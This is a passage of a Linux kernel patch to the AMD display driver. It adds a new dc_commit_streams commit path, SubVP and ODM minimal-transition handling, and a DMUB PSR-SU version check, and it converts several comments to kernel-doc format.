+ }
+ 
+ static void update_stream_scaling_settings(const struct drm_display_mode *mode,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index 05708684c9f58..d07e1053b36b3 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -677,7 +677,7 @@ void dm_handle_mst_sideband_msg_ready_event(
+ 
+ 			if (retry == 3) {
+ 				DRM_ERROR("Failed to ack MST event.\n");
+-				return;
++				break;
+ 			}
+ 
+ 			drm_dp_mst_hpd_irq_send_new_request(&aconnector->mst_mgr);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
+index e6854f7270a66..3c50b3ff79541 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
+@@ -1600,6 +1600,10 @@ int amdgpu_dm_plane_init(struct amdgpu_display_manager *dm,
+ 		drm_plane_create_rotation_property(plane, DRM_MODE_ROTATE_0,
+ 						   supported_rotations);
+ 
++	if (dm->adev->ip_versions[DCE_HWIP][0] > IP_VERSION(3, 0, 1) &&
++	    plane->type != DRM_PLANE_TYPE_CURSOR)
++		drm_plane_enable_fb_damage_clips(plane);
++
+ 	drm_plane_helper_add(plane, &dm_plane_helper_funcs);
+ 
+ #ifdef CONFIG_DRM_AMD_DC_HDR
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
+index 872d06fe14364..3eb8794807d2b 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
+@@ -24,6 +24,7 @@
+  */
+ 
+ #include "amdgpu_dm_psr.h"
++#include "dc_dmub_srv.h"
+ #include "dc.h"
+ #include "dm_helpers.h"
+ #include "amdgpu_dm.h"
+@@ -50,7 +51,7 @@ static bool link_supports_psrsu(struct dc_link *link)
+ 	    !link->dpcd_caps.psr_info.psr2_su_y_granularity_cap)
+ 		return false;
+ 
+-	return true;
++	return dc_dmub_check_min_version(dc->ctx->dmub_srv->dmub);
+ }
+ 
+ /*
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c
+index 20a06c04e4a1d..e43b4d7dc60e2 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c
+@@ -108,6 +108,11 @@ static int dcn314_get_active_display_cnt_wa(
+ 				stream->signal == SIGNAL_TYPE_DVI_SINGLE_LINK ||
+ 				stream->signal == SIGNAL_TYPE_DVI_DUAL_LINK)
+ 			tmds_present = true;
++
++		/* Checking stream / link detection ensuring that PHY is active*/
++		if (dc_is_dp_signal(stream->signal) && !stream->dpms_off)
++			display_count++;
++
+ 	}
+ 
+ 	for (i = 0; i < dc->link_count; i++) {
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index cca0143444164..8f9c60ed6f8b8 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -135,9 +135,7 @@ static const char DC_BUILD_ID[] = "production-build";
+  * one or two (in the pipe-split case).
+  */
+ 
+-/*******************************************************************************
+- * Private functions
+- ******************************************************************************/
++/* Private functions */
+ 
+ static inline void elevate_update_type(enum surface_update_type *original, enum surface_update_type new)
+ {
+@@ -384,16 +382,18 @@ static void dc_perf_trace_destroy(struct dc_perf_trace **perf_trace)
+ }
+ 
+ /**
+- *  dc_stream_adjust_vmin_vmax:
++ *  dc_stream_adjust_vmin_vmax - look up pipe context & update parts of DRR
++ *  @dc:     dc reference
++ *  @stream: Initial dc stream state
++ *  @adjust: Updated parameters for vertical_total_min and vertical_total_max
+  *
+  *  Looks up the pipe context of dc_stream_state and updates the
+  *  vertical_total_min and vertical_total_max of the DRR, Dynamic Refresh
+  *  Rate, which is a power-saving feature that targets reducing panel
+  *  refresh rate while the screen is static
+  *
+- *  @dc:     dc reference
+- *  @stream: Initial dc stream state
+- *  @adjust: Updated parameters for vertical_total_min and vertical_total_max
++ *  Return: %true if the pipe context is found and adjusted;
++ *          %false if the pipe context is not found.
+  */
+ bool dc_stream_adjust_vmin_vmax(struct dc *dc,
+ 		struct dc_stream_state *stream,
+@@ -429,18 +429,17 @@ bool dc_stream_adjust_vmin_vmax(struct dc *dc,
+ }
+ 
+ /**
+- *****************************************************************************
+- *  Function: dc_stream_get_last_vrr_vtotal
++ * dc_stream_get_last_used_drr_vtotal - Looks up the pipe context of
++ * dc_stream_state and gets the last VTOTAL used by DRR (Dynamic Refresh Rate)
+  *
+- *  @brief
+- *     Looks up the pipe context of dc_stream_state and gets the
+- *     last VTOTAL used by DRR (Dynamic Refresh Rate)
++ * @dc: [in] dc reference
++ * @stream: [in] Initial dc stream state
++ * @refresh_rate: [in] new refresh_rate
+  *
+- *  @param [in] dc: dc reference
+- *  @param [in] stream: Initial dc stream state
+- *  @param [in] adjust: Updated parameters for vertical_total_min and
+- *  vertical_total_max
+- *****************************************************************************
++ * Return: %true if the pipe context is found and there is an associated
++ *         timing_generator for the DC;
++ *         %false if the pipe context is not found or there is no
++ *         timing_generator for the DC.
+  */
+ bool dc_stream_get_last_used_drr_vtotal(struct dc *dc,
+ 		struct dc_stream_state *stream,
+@@ -587,7 +586,10 @@ bool dc_stream_stop_dmcu_crc_win_update(struct dc *dc, struct dc_stream_state *s
+  *              once.
+  *
+  * By default, only CRC0 is configured, and the entire frame is used to
+- * calculate the crc.
++ * calculate the CRC.
++ *
++ * Return: %false if the stream is not found or CRC capture is not supported;
++ *         %true if the stream has been configured.
+  */
+ bool dc_stream_configure_crc(struct dc *dc, struct dc_stream_state *stream,
+ 			     struct crc_params *crc_window, bool enable, bool continuous)
+@@ -656,7 +658,7 @@ bool dc_stream_configure_crc(struct dc *dc, struct dc_stream_state *stream,
+  * dc_stream_configure_crc needs to be called beforehand to enable CRCs.
+  *
+  * Return:
+- * false if stream is not found, or if CRCs are not enabled.
++ * %false if stream is not found, or if CRCs are not enabled.
+  */
+ bool dc_stream_get_crc(struct dc *dc, struct dc_stream_state *stream,
+ 		       uint32_t *r_cr, uint32_t *g_y, uint32_t *b_cb)
+@@ -1236,9 +1238,7 @@ static void wait_for_no_pipes_pending(struct dc *dc, struct dc_state *context)
+ 	PERF_TRACE();
+ }
+ 
+-/*******************************************************************************
+- * Public functions
+- ******************************************************************************/
++/* Public functions */
+ 
+ struct dc *dc_create(const struct dc_init_data *init_params)
+ {
+@@ -1505,17 +1505,19 @@ static void program_timing_sync(
+ 	}
+ }
+ 
+-static bool context_changed(
+-		struct dc *dc,
+-		struct dc_state *context)
++static bool streams_changed(struct dc *dc,
++			    struct dc_stream_state *streams[],
++			    uint8_t stream_count)
+ {
+ 	uint8_t i;
+ 
+-	if (context->stream_count != dc->current_state->stream_count)
++	if (stream_count != dc->current_state->stream_count)
+ 		return true;
+ 
+ 	for (i = 0; i < dc->current_state->stream_count; i++) {
+-		if (dc->current_state->streams[i] != context->streams[i])
++		if (dc->current_state->streams[i] != streams[i])
++			return true;
++		if (!streams[i]->link->link_state_valid)
+ 			return true;
+ 	}
+ 
+@@ -1745,6 +1747,8 @@ void dc_z10_save_init(struct dc *dc)
+ /*
+  * Applies given context to HW and copy it into current context.
+  * It's up to the user to release the src context afterwards.
++ *
++ * Return: an enum dc_status result code for the operation
+  */
+ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *context)
+ {
+@@ -1911,12 +1915,114 @@ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *c
+ 	return result;
+ }
+ 
++static bool commit_minimal_transition_state(struct dc *dc,
++		struct dc_state *transition_base_context);
++
++/**
++ * dc_commit_streams - Commit current stream state
++ *
++ * @dc: DC object with the commit state to be configured in the hardware
++ * @streams: Array with a list of stream state
++ * @stream_count: Total of streams
++ *
++ * Function responsible for commit streams change to the hardware.
++ *
++ * Return:
++ * Return DC_OK if everything work as expected, otherwise, return a dc_status
++ * code.
++ */
++enum dc_status dc_commit_streams(struct dc *dc,
++				 struct dc_stream_state *streams[],
++				 uint8_t stream_count)
++{
++	int i, j;
++	struct dc_state *context;
++	enum dc_status res = DC_OK;
++	struct dc_validation_set set[MAX_STREAMS] = {0};
++	struct pipe_ctx *pipe;
++	bool handle_exit_odm2to1 = false;
++
++	if (!streams_changed(dc, streams, stream_count))
++		return res;
++
++	DC_LOG_DC("%s: %d streams\n", __func__, stream_count);
++
++	for (i = 0; i < stream_count; i++) {
++		struct dc_stream_state *stream = streams[i];
++		struct dc_stream_status *status = dc_stream_get_status(stream);
++
++		dc_stream_log(dc, stream);
++
++		set[i].stream = stream;
++
++		if (status) {
++			set[i].plane_count = status->plane_count;
++			for (j = 0; j < status->plane_count; j++)
++				set[i].plane_states[j] = status->plane_states[j];
++		}
++	}
++
++	/* Check for case where we are going from odm 2:1 to max
++	 *  pipe scenario.  For these cases, we will call
++	 *  commit_minimal_transition_state() to exit out of odm 2:1
++	 *  first before processing new streams
++	 */
++	if (stream_count == dc->res_pool->pipe_count) {
++		for (i = 0; i < dc->res_pool->pipe_count; i++) {
++			pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++			if (pipe->next_odm_pipe)
++				handle_exit_odm2to1 = true;
++		}
++	}
++
++	if (handle_exit_odm2to1)
++		res = commit_minimal_transition_state(dc, dc->current_state);
++
++	context = dc_create_state(dc);
++	if (!context)
++		goto context_alloc_fail;
++
++	dc_resource_state_copy_construct_current(dc, context);
++
++	/*
++	 * Previous validation was perfomred with fast_validation = true and
++	 * the full DML state required for hardware programming was skipped.
++	 *
++	 * Re-validate here to calculate these parameters / watermarks.
++	 */
++	res = dc_validate_global_state(dc, context, false);
++	if (res != DC_OK) {
++		DC_LOG_ERROR("DC commit global validation failure: %s (%d)",
++			     dc_status_to_str(res), res);
++		return res;
++	}
++
++	res = dc_commit_state_no_check(dc, context);
++
++context_alloc_fail:
++
++	DC_LOG_DC("%s Finished.\n", __func__);
++
++	return (res == DC_OK);
++}
++
++/* TODO: When the transition to the new commit sequence is done, remove this
++ * function in favor of dc_commit_streams. */
+ bool dc_commit_state(struct dc *dc, struct dc_state *context)
+ {
+ 	enum dc_status result = DC_ERROR_UNEXPECTED;
+ 	int i;
+ 
+-	if (!context_changed(dc, context))
++	/* TODO: Since change commit sequence can have a huge impact,
++	 * we decided to only enable it for DCN3x. However, as soon as
++	 * we get more confident about this change we'll need to enable
++	 * the new sequence for all ASICs. */
++	if (dc->ctx->dce_version >= DCN_VERSION_3_2) {
++		result = dc_commit_streams(dc, context->streams, context->stream_count);
++		return result == DC_OK;
++	}
++
++	if (!streams_changed(dc, context->streams, context->stream_count))
+ 		return DC_OK;
+ 
+ 	DC_LOG_DC("%s: %d streams\n",
+@@ -2482,8 +2588,11 @@ static enum surface_update_type check_update_surfaces_for_stream(
+ 
+ 		if (stream_update->mst_bw_update)
+ 			su_flags->bits.mst_bw = 1;
+-		if (stream_update->crtc_timing_adjust && dc_extended_blank_supported(dc))
+-			su_flags->bits.crtc_timing_adjust = 1;
++
++		if (stream_update->stream && stream_update->stream->freesync_on_desktop &&
++			(stream_update->vrr_infopacket || stream_update->allow_freesync ||
++				stream_update->vrr_active_variable))
++			su_flags->bits.fams_changed = 1;
+ 
+ 		if (su_flags->raw != 0)
+ 			overall_type = UPDATE_TYPE_FULL;
+@@ -3648,17 +3757,17 @@ static bool could_mpcc_tree_change_for_active_pipes(struct dc *dc,
+ 		}
+ 	}
+ 
+-	/* For SubVP when adding MPO video we need to add a minimal transition.
++	/* For SubVP when adding or removing planes we need to add a minimal transition
++	 * (even when disabling all planes). Whenever disabling a phantom pipe, we
++	 * must use the minimal transition path to disable the pipe correctly.
+ 	 */
+ 	if (cur_stream_status && stream->mall_stream_config.type == SUBVP_MAIN) {
+ 		/* determine if minimal transition is required due to SubVP*/
+-		if (surface_count > 0) {
+-			if (cur_stream_status->plane_count > surface_count) {
+-				force_minimal_pipe_splitting = true;
+-			} else if (cur_stream_status->plane_count < surface_count) {
+-				force_minimal_pipe_splitting = true;
+-				*is_plane_addition = true;
+-			}
++		if (cur_stream_status->plane_count > surface_count) {
++			force_minimal_pipe_splitting = true;
++		} else if (cur_stream_status->plane_count < surface_count) {
++			force_minimal_pipe_splitting = true;
++			*is_plane_addition = true;
+ 		}
+ 	}
+ 
+@@ -3675,6 +3784,8 @@ static bool commit_minimal_transition_state(struct dc *dc,
+ 	enum dc_status ret = DC_ERROR_UNEXPECTED;
+ 	unsigned int i, j;
+ 	unsigned int pipe_in_use = 0;
++	bool subvp_in_use = false;
++	bool odm_in_use = false;
+ 
+ 	if (!transition_context)
+ 		return false;
+@@ -3687,6 +3798,30 @@ static bool commit_minimal_transition_state(struct dc *dc,
+ 			pipe_in_use++;
+ 	}
+ 
++	/* If SubVP is enabled and we are adding or removing planes from any main subvp
++	 * pipe, we must use the minimal transition.
++	 */
++	for (i = 0; i < dc->res_pool->pipe_count; i++) {
++		struct pipe_ctx *pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++
++		if (pipe->stream && pipe->stream->mall_stream_config.type == SUBVP_PHANTOM) {
++			subvp_in_use = true;
++			break;
++		}
++	}
++
++	/* If ODM is enabled and we are adding or removing planes from any ODM
++	 * pipe, we must use the minimal transition.
++	 */
++	for (i = 0; i < dc->res_pool->pipe_count; i++) {
++		struct pipe_ctx *pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++
++		if (pipe->stream && pipe->next_odm_pipe) {
++			odm_in_use = true;
++			break;
++		}
++	}
++
+ 	/* When the OS add a new surface if we have been used all of pipes with odm combine
+ 	 * and mpc split feature, it need use commit_minimal_transition_state to transition safely.
+ 	 * After OS exit MPO, it will back to use odm and mpc split with all of pipes, we need
+@@ -3695,7 +3830,7 @@ static bool commit_minimal_transition_state(struct dc *dc,
+ 	 * Reduce the scenarios to use dc_commit_state_no_check in the stage of flip. Especially
+ 	 * enter/exit MPO when DCN still have enough resources.
+ 	 */
+-	if (pipe_in_use != dc->res_pool->pipe_count) {
++	if (pipe_in_use != dc->res_pool->pipe_count && !subvp_in_use && !odm_in_use) {
+ 		dc_release_state(transition_context);
+ 		return true;
+ 	}
+@@ -4430,21 +4565,17 @@ void dc_mclk_switch_using_fw_based_vblank_stretch_shut_down(struct dc *dc)
+ 		dc->current_state->bw_ctx.bw.dcn.clk.fw_based_mclk_switching_shut_down = true;
+ }
+ 
+-/*
+- *****************************************************************************
+- * Function: dc_is_dmub_outbox_supported -
++/**
++ * dc_is_dmub_outbox_supported - Check if DMUB firmware support outbox notification
+  *
+- * @brief
+- *      Checks whether DMUB FW supports outbox notifications, if supported
+- *		DM should register outbox interrupt prior to actually enabling interrupts
+- *		via dc_enable_dmub_outbox
++ * @dc: [in] dc structure
+  *
+- *  @param
+- *		[in] dc: dc structure
++ * Checks whether DMUB FW supports outbox notifications, if supported DM
++ * should register outbox interrupt prior to actually enabling interrupts
++ * via dc_enable_dmub_outbox
+  *
+- *  @return
+- *		True if DMUB FW supports outbox notifications, False otherwise
+- *****************************************************************************
++ * Return:
++ * True if DMUB FW supports outbox notifications, False otherwise
+  */
+ bool dc_is_dmub_outbox_supported(struct dc *dc)
+ {
+@@ -4462,21 +4593,17 @@ bool dc_is_dmub_outbox_supported(struct dc *dc)
+ 	return dc->debug.enable_dmub_aux_for_legacy_ddc;
+ }
+ 
+-/*
+- *****************************************************************************
+- *  Function: dc_enable_dmub_notifications
++/**
++ * dc_enable_dmub_notifications - Check if dmub fw supports outbox
+  *
+- *  @brief
+- *		Calls dc_is_dmub_outbox_supported to check if dmub fw supports outbox
+- *		notifications. All DMs shall switch to dc_is_dmub_outbox_supported.
+- *		This API shall be removed after switching.
++ * @dc: [in] dc structure
+  *
+- *  @param
+- *		[in] dc: dc structure
++ * Calls dc_is_dmub_outbox_supported to check if dmub fw supports outbox
++ * notifications. All DMs shall switch to dc_is_dmub_outbox_supported.  This
++ * API shall be removed after switching.
+  *
+- *  @return
+- *		True if DMUB FW supports outbox notifications, False otherwise
+- *****************************************************************************
++ * Return:
++ * True if DMUB FW supports outbox notifications, False otherwise
+  */
+ bool dc_enable_dmub_notifications(struct dc *dc)
+ {
+@@ -4484,18 +4611,11 @@ bool dc_enable_dmub_notifications(struct dc *dc)
+ }
+ 
+ /**
+- *****************************************************************************
+- *  Function: dc_enable_dmub_outbox
+- *
+- *  @brief
+- *		Enables DMUB unsolicited notifications to x86 via outbox
++ * dc_enable_dmub_outbox - Enables DMUB unsolicited notification
+  *
+- *  @param
+- *		[in] dc: dc structure
++ * @dc: [in] dc structure
+  *
+- *  @return
+- *		None
+- *****************************************************************************
++ * Enables DMUB unsolicited notifications to x86 via outbox.
+  */
+ void dc_enable_dmub_outbox(struct dc *dc)
+ {
+@@ -4596,21 +4716,17 @@ uint8_t get_link_index_from_dpia_port_index(const struct dc *dc,
+ }
+ 
+ /**
+- *****************************************************************************
+- *  Function: dc_process_dmub_set_config_async
++ * dc_process_dmub_set_config_async - Submits set_config command
+  *
+- *  @brief
+- *		Submits set_config command to dmub via inbox message
++ * @dc: [in] dc structure
++ * @link_index: [in] link_index: link index
++ * @payload: [in] aux payload
++ * @notify: [out] set_config immediate reply
+  *
+- *  @param
+- *		[in] dc: dc structure
+- *		[in] link_index: link index
+- *		[in] payload: aux payload
+- *		[out] notify: set_config immediate reply
++ * Submits set_config command to dmub via inbox message.
+  *
+- *  @return
+- *		True if successful, False if failure
+- *****************************************************************************
++ * Return:
++ * True if successful, False if failure
+  */
+ bool dc_process_dmub_set_config_async(struct dc *dc,
+ 				uint32_t link_index,
+@@ -4646,21 +4762,17 @@ bool dc_process_dmub_set_config_async(struct dc *dc,
+ }
+ 
+ /**
+- *****************************************************************************
+- *  Function: dc_process_dmub_set_mst_slots
++ * dc_process_dmub_set_mst_slots - Submits MST solt allocation
+  *
+- *  @brief
+- *		Submits mst slot allocation command to dmub via inbox message
++ * @dc: [in] dc structure
++ * @link_index: [in] link index
++ * @mst_alloc_slots: [in] mst slots to be allotted
++ * @mst_slots_in_use: [out] mst slots in use returned in failure case
+  *
+- *  @param
+- *		[in] dc: dc structure
+- *		[in] link_index: link index
+- *		[in] mst_alloc_slots: mst slots to be allotted
+- *		[out] mst_slots_in_use: mst slots in use returned in failure case
++ * Submits mst slot allocation command to dmub via inbox message
+  *
+- *	@return
+- *		DC_OK if successful, DC_ERROR if failure
+- *****************************************************************************
++ * Return:
++ * DC_OK if successful, DC_ERROR if failure
+  */
+ enum dc_status dc_process_dmub_set_mst_slots(const struct dc *dc,
+ 				uint32_t link_index,
+@@ -4700,19 +4812,12 @@ enum dc_status dc_process_dmub_set_mst_slots(const struct dc *dc,
+ }
+ 
+ /**
+- *****************************************************************************
+- *  Function: dc_process_dmub_dpia_hpd_int_enable
+- *
+- *  @brief
+- *		Submits dpia hpd int enable command to dmub via inbox message
++ * dc_process_dmub_dpia_hpd_int_enable - Submits DPIA DPD interruption
+  *
+- *  @param
+- *		[in] dc: dc structure
+- *		[in] hpd_int_enable: 1 for hpd int enable, 0 to disable
++ * @dc: [in] dc structure
++ * @hpd_int_enable: [in] 1 for hpd int enable, 0 to disable
+  *
+- *	@return
+- *		None
+- *****************************************************************************
++ * Submits dpia hpd int enable command to dmub via inbox message
+  */
+ void dc_process_dmub_dpia_hpd_int_enable(const struct dc *dc,
+ 				uint32_t hpd_int_enable)
+@@ -4741,16 +4846,13 @@ void dc_disable_accelerated_mode(struct dc *dc)
+ 
+ 
+ /**
+- *****************************************************************************
+- *  dc_notify_vsync_int_state() - notifies vsync enable/disable state
++ *  dc_notify_vsync_int_state - notifies vsync enable/disable state
+  *  @dc: dc structure
+- *	@stream: stream where vsync int state changed
+- *	@enable: whether vsync is enabled or disabled
+- *
+- *  Called when vsync is enabled/disabled
+- *	Will notify DMUB to start/stop ABM interrupts after steady state is reached
++ *  @stream: stream where vsync int state changed
++ *  @enable: whether vsync is enabled or disabled
+  *
+- *****************************************************************************
++ *  Called when vsync is enabled/disabled Will notify DMUB to start/stop ABM
++ *  interrupts after steady state is reached.
+  */
+ void dc_notify_vsync_int_state(struct dc *dc, struct dc_stream_state *stream, bool enable)
+ {
+@@ -4792,17 +4894,3 @@ void dc_notify_vsync_int_state(struct dc *dc, struct dc_stream_state *stream, bo
+ 	if (pipe->stream_res.abm && pipe->stream_res.abm->funcs->set_abm_pause)
+ 		pipe->stream_res.abm->funcs->set_abm_pause(pipe->stream_res.abm, !enable, i, pipe->stream_res.tg->inst);
+ }
+-/*
+- * dc_extended_blank_supported: Decide whether extended blank is supported
+- *
+- * Extended blank is a freesync optimization feature to be enabled in the future.
+- * During the extra vblank period gained from freesync, we have the ability to enter z9/z10.
+- *
+- * @param [in] dc: Current DC state
+- * @return: Indicate whether extended blank is supported (true or false)
+- */
+-bool dc_extended_blank_supported(struct dc *dc)
+-{
+-	return dc->debug.extended_blank_optimization && !dc->debug.disable_z10
+-		&& dc->caps.zstate_support && dc->caps.is_apu;
+-}
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index f0d05829288bd..a26e52abc9898 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -1444,6 +1444,26 @@ static int acquire_first_split_pipe(
+ 			split_pipe->plane_res.mpcc_inst = pool->dpps[i]->inst;
+ 			split_pipe->pipe_idx = i;
+ 
++			split_pipe->stream = stream;
++			return i;
++		} else if (split_pipe->prev_odm_pipe &&
++				split_pipe->prev_odm_pipe->plane_state == split_pipe->plane_state) {
++			split_pipe->prev_odm_pipe->next_odm_pipe = split_pipe->next_odm_pipe;
++			if (split_pipe->next_odm_pipe)
++				split_pipe->next_odm_pipe->prev_odm_pipe = split_pipe->prev_odm_pipe;
++
++			if (split_pipe->prev_odm_pipe->plane_state)
++				resource_build_scaling_params(split_pipe->prev_odm_pipe);
++
++			memset(split_pipe, 0, sizeof(*split_pipe));
++			split_pipe->stream_res.tg = pool->timing_generators[i];
++			split_pipe->plane_res.hubp = pool->hubps[i];
++			split_pipe->plane_res.ipp = pool->ipps[i];
++			split_pipe->plane_res.dpp = pool->dpps[i];
++			split_pipe->stream_res.opp = pool->opps[i];
++			split_pipe->plane_res.mpcc_inst = pool->dpps[i]->inst;
++			split_pipe->pipe_idx = i;
++
+ 			split_pipe->stream = stream;
+ 			return i;
+ 		}
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index 3f277009075fd..6409b8d8ff71e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -56,9 +56,7 @@ struct dmub_notification;
+ #define MIN_VIEWPORT_SIZE 12
+ #define MAX_NUM_EDP 2
+ 
+-/*******************************************************************************
+- * Display Core Interfaces
+- ******************************************************************************/
++/* Display Core Interfaces */
+ struct dc_versions {
+ 	const char *dc_ver;
+ 	struct dmcu_version dmcu_version;
+@@ -993,9 +991,7 @@ void dc_init_callbacks(struct dc *dc,
+ void dc_deinit_callbacks(struct dc *dc);
+ void dc_destroy(struct dc **dc);
+ 
+-/*******************************************************************************
+- * Surface Interfaces
+- ******************************************************************************/
++/* Surface Interfaces */
+ 
+ enum {
+ 	TRANSFER_FUNC_POINTS = 1025
+@@ -1274,12 +1270,23 @@ void dc_post_update_surfaces_to_stream(
+ 
+ #include "dc_stream.h"
+ 
+-/*
+- * Structure to store surface/stream associations for validation
++/**
++ * struct dc_validation_set - Struct to store surface/stream associations for validation
+  */
+ struct dc_validation_set {
++	/**
++	 * @stream: Stream state properties
++	 */
+ 	struct dc_stream_state *stream;
++
++	/**
++	 * @plane_state: Surface state
++	 */
+ 	struct dc_plane_state *plane_states[MAX_SURFACES];
++
++	/**
++	 * @plane_count: Total of active planes
++	 */
+ 	uint8_t plane_count;
+ };
+ 
+@@ -1326,15 +1333,12 @@ void dc_resource_state_destruct(struct dc_state *context);
+ 
+ bool dc_resource_is_dsc_encoding_supported(const struct dc *dc);
+ 
+-/*
+- * TODO update to make it about validation sets
+- * Set up streams and links associated to drive sinks
+- * The streams parameter is an absolute set of all active streams.
+- *
+- * After this call:
+- *   Phy, Encoder, Timing Generator are programmed and enabled.
+- *   New streams are enabled with blank stream; no memory read.
+- */
++enum dc_status dc_commit_streams(struct dc *dc,
++				 struct dc_stream_state *streams[],
++				 uint8_t stream_count);
++
++/* TODO: When the transition to the new commit sequence is done, remove this
++ * function in favor of dc_commit_streams. */
+ bool dc_commit_state(struct dc *dc, struct dc_state *context);
+ 
+ struct dc_state *dc_create_state(struct dc *dc);
+@@ -1342,9 +1346,7 @@ struct dc_state *dc_copy_state(struct dc_state *src_ctx);
+ void dc_retain_state(struct dc_state *context);
+ void dc_release_state(struct dc_state *context);
+ 
+-/*******************************************************************************
+- * Link Interfaces
+- ******************************************************************************/
++/* Link Interfaces */
+ 
+ struct dpcd_caps {
+ 	union dpcd_rev dpcd_rev;
+@@ -1446,9 +1448,7 @@ struct hdcp_caps {
+ 
+ uint32_t dc_get_opp_for_plane(struct dc *dc, struct dc_plane_state *plane);
+ 
+-/*******************************************************************************
+- * Sink Interfaces - A sink corresponds to a display output device
+- ******************************************************************************/
++/* Sink Interfaces - A sink corresponds to a display output device */
+ 
+ struct dc_container_id {
+ 	// 128bit GUID in binary form
+@@ -1520,8 +1520,6 @@ struct dc_sink_init_data {
+ 	bool converter_disable_audio;
+ };
+ 
+-bool dc_extended_blank_supported(struct dc *dc);
+-
+ struct dc_sink *dc_sink_create(const struct dc_sink_init_data *init_params);
+ 
+ /* Newer interfaces  */
+@@ -1531,9 +1529,7 @@ struct dc_cursor {
+ };
+ 
+ 
+-/*******************************************************************************
+- * Interrupt interfaces
+- ******************************************************************************/
++/* Interrupt interfaces */
+ enum dc_irq_source dc_interrupt_to_irq_source(
+ 		struct dc *dc,
+ 		uint32_t src_id,
+@@ -1545,9 +1541,7 @@ enum dc_irq_source dc_get_hpd_irq_source_at_index(
+ 
+ void dc_notify_vsync_int_state(struct dc *dc, struct dc_stream_state *stream, bool enable);
+ 
+-/*******************************************************************************
+- * Power Interfaces
+- ******************************************************************************/
++/* Power Interfaces */
+ 
+ void dc_set_power_state(
+ 		struct dc *dc,
+@@ -1620,14 +1614,10 @@ enum dc_status dc_process_dmub_set_mst_slots(const struct dc *dc,
+ void dc_process_dmub_dpia_hpd_int_enable(const struct dc *dc,
+ 				uint32_t hpd_int_enable);
+ 
+-/*******************************************************************************
+- * DSC Interfaces
+- ******************************************************************************/
++/* DSC Interfaces */
+ #include "dc_dsc.h"
+ 
+-/*******************************************************************************
+- * Disable acc mode Interfaces
+- ******************************************************************************/
++/* Disable acc mode Interfaces */
+ void dc_disable_accelerated_mode(struct dc *dc);
+ 
+ #endif /* DC_INTERFACE_H_ */
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c b/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c
+index a461e9463534b..31bb7e782c6b1 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c
++++ b/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c
+@@ -1026,3 +1026,10 @@ void dc_send_update_cursor_info_to_dmu(
+ 		dc_send_cmd_to_dmu(pCtx->stream->ctx->dmub_srv, &cmd);
+ 	}
+ }
++
++bool dc_dmub_check_min_version(struct dmub_srv *srv)
++{
++	if (!srv->hw_funcs.is_psrsu_supported)
++		return true;
++	return srv->hw_funcs.is_psrsu_supported(srv);
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.h b/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.h
+index d34f5563df2ec..9a248ced03b9c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.h
+@@ -89,4 +89,5 @@ void dc_dmub_setup_subvp_dmub_command(struct dc *dc, struct dc_state *context, b
+ void dc_dmub_srv_log_diagnostic_data(struct dc_dmub_srv *dc_dmub_srv);
+ 
+ void dc_send_update_cursor_info_to_dmu(struct pipe_ctx *pCtx, uint8_t pipe_idx);
++bool dc_dmub_check_min_version(struct dmub_srv *srv);
+ #endif /* _DMUB_DC_SRV_H_ */
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_stream.h b/drivers/gpu/drm/amd/display/dc/dc_stream.h
+index 9e6025c98db91..364ff913527d8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_stream.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_stream.h
+@@ -41,6 +41,10 @@ struct timing_sync_info {
+ struct dc_stream_status {
+ 	int primary_otg_inst;
+ 	int stream_enc_inst;
++
++	/**
++	 * @plane_count: Total of planes attached to a single stream
++	 */
+ 	int plane_count;
+ 	int audio_inst;
+ 	struct timing_sync_info timing_sync_info;
